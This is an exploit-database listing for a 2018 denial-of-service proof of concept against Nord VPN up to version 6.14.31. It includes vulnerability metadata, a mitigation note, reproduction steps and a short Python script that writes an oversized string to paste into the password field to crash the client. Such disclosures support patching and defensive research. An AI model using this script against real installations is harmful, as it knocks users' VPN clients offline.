header-logo
Suggest Exploit
vendor:
Nord VPN
by:
L0RD (borna nematzadeh)
7.5
CVSS
HIGH
Denial of Service
119
CWE
Product Name: Nord VPN
Affected Version From: <= 6.14.31
Affected Version To: <= 6.14.31
Patch Exists: YES
Related CWE: N/A
CPE: a:nordvpn:nordvpn
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Windows 10
2018

Nord VPN <= 6.14.31 - Denial of Service (PoC)

A buffer overflow vulnerability exists in Nord VPN version <= 6.14.31 which allows an attacker to cause a denial of service condition by running a python exploit code and copying the content of the generated file into the password field of the Nord VPN application.

Mitigation:

Upgrade to the latest version of Nord VPN to mitigate this vulnerability.
Source

Exploit-DB raw data:

# Exploit Title: Nord VPN <= 6.14.31 - Denial of Service (PoC)
# Exploit Author : L0RD (borna nematzadeh)
# Contact: borna.nematzadeh123@gmail.com
# Date: 2018-08-30
# Vendor Homepage : https://nordvpn.com
# Software link: https://nordvpn.com/download/
# Version: <= 6.14.31
# Tested on: Windows 10
# CVE: N/A

# Steps to reproduce:
# 1) Run the python exploit code and open "nord.txt" file
# 2) Copy the content of file
# 3) Open Nord vpn
# 4) Put anything (like test@test.com) into username field and paste content of "nord.txt" into password
# 5) Crash!

#!/usr/bin/python

buffer = "\x41" * 100000
f = open ("nord.txt", "w")
f.write(buffer)
f.close()
print "File created"